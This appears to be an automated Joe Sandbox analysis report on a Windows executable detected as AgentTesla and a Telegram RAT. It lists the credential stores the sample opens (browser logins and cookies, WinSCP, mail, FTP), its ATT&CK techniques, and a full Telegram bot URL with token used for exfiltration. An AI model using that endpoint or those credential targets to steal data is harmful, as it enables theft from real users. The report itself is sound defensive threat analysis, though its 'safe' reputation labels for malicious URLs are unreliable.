                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598562Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598453Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598344Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598234Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598123Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598000Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597891Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597766Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597651Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597531Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597422Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597307Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597188Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597063Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596938Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596813Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596688Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596578Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596462Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596355Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596234Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596125Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596015Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595912Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595781Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595672Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595547Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595437Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595328Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595219Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595094Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594984Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594859Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594750Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594641Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594531Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594422Jump to behavior
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4107212038.0000000001685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllagementCapabilities
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeQueries volume information: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected AgentTesla
                          Source: Yara matchFile source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, type: SAMPLE
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe PID: 6768, type: MEMORYSTR
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe PID: 6768, type: MEMORYSTR
                          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                          Tries to steal Mail credentials (via file / registry access)
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                          Source: Yara matchFile source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe PID: 6768, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected AgentTesla
                          Source: Yara matchFile source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, type: SAMPLE
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe PID: 6768, type: MEMORYSTR
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe PID: 6768, type: MEMORYSTR

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		1
                          Query Registry                          		Remote Services1
                          Email Collection                          		1
                          Web Service                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts141
                          Virtualization/Sandbox Evasion                          		21
                          Input Capture                          		111
                          Security Software Discovery                          		Remote Desktop Protocol21
                          Input Capture                          		11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                          Deobfuscate/Decode Files or Information                          		1
                          Credentials in Registry                          		1
                          Process Discovery                          		SMB/Windows Admin Shares11
                          Archive Collected Data                          		2
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          DLL Side-Loading                          		NTDS141
                          Virtualization/Sandbox Evasion                          		Distributed Component Object Model2
                          Data from Local System                          		3
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
                          Application Window Discovery                          		SSH1
                          Clipboard Data                          		Fallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                          File and Directory Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync24
                          System Information Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe100%AviraHEUR/AGEN.1305739
                          1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe100%Joe Sandbox ML

                          Dropped Files

                          No Antivirus matches

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://api.telegram0%URL Reputationsafe
                          https://account.dyn.com/0%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                          https://api.telegram.org0%Avira URL Cloudsafe
                          https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/0%Avira URL Cloudsafe
                          http://api.telegram.org0%Avira URL Cloudsafe
                          https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          api.telegram.org
                          		149.154.167.220
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocumenttrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.telegram1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		unknown
                            https://account.dyn.com/1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exefalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003574000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003633000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003439000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://api.telegram.org1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003574000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003633000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exetrue
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            149.154.167.220
                            		api.telegram.orgUnited Kingdom
                            		62041TELEGRAMRUtrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1443568
                            Start date and time:2024-05-18 01:35:04 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 46s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 46
                            • Number of non-executed functions: 2
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            19:35:57API Interceptor12857279x Sleep call for process: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            149.154.167.220DsQnR4KKDbEYJq8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              SecuriteInfo.com.Trojan.Siggen28.19290.17748.11549.exeGet hashmaliciousBabuk, CORNY Ransomware, Chaos, Ragnarok, TrojanRansomBrowse
                                t2SFfMxQP1.exeGet hashmaliciousPureLog Stealer, RedLine, XWormBrowse
                                  e-dekont.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    Payment Invoice.jsGet hashmaliciousUnknownBrowse
                                      voicemail Account.jsGet hashmaliciousPureLog StealerBrowse
                                        Invoices Receivable Documents.jsGet hashmaliciousUnknownBrowse
                                          Accounts Receivable Documents.jsGet hashmaliciousUnknownBrowse
                                            Order Inquiry for new Purchase_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              MVng2nP3xU.exeGet hashmaliciousNightingale StealerBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                api.telegram.orgDsQnR4KKDbEYJq8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 149.154.167.220
                                                SecuriteInfo.com.Trojan.Siggen28.19290.17748.11549.exeGet hashmaliciousBabuk, CORNY Ransomware, Chaos, Ragnarok, TrojanRansomBrowse
                                                • 149.154.167.220
                                                t2SFfMxQP1.exeGet hashmaliciousPureLog Stealer, RedLine, XWormBrowse
                                                • 149.154.167.220
                                                e-dekont.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 149.154.167.220
                                                Payment Invoice.jsGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                voicemail Account.jsGet hashmaliciousPureLog StealerBrowse
                                                • 149.154.167.220
                                                Invoices Receivable Documents.jsGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                Accounts Receivable Documents.jsGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                Order Inquiry for new Purchase_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                MVng2nP3xU.exeGet hashmaliciousNightingale StealerBrowse
                                                • 149.154.167.220

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TELEGRAMRUSecuriteInfo.com.Win32.Malware-gen.24694.6353.exeGet hashmaliciousCryptOne, VidarBrowse
                                                • 149.154.167.99
                                                DsQnR4KKDbEYJq8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 149.154.167.220
                                                SecuriteInfo.com.Trojan.Siggen28.19290.17748.11549.exeGet hashmaliciousBabuk, CORNY Ransomware, Chaos, Ragnarok, TrojanRansomBrowse
                                                • 149.154.167.220
                                                t2SFfMxQP1.exeGet hashmaliciousPureLog Stealer, RedLine, XWormBrowse
                                                • 149.154.167.220
                                                e-dekont.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 149.154.167.220
                                                Payment Invoice.jsGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                voicemail Account.jsGet hashmaliciousPureLog StealerBrowse
                                                • 149.154.167.220
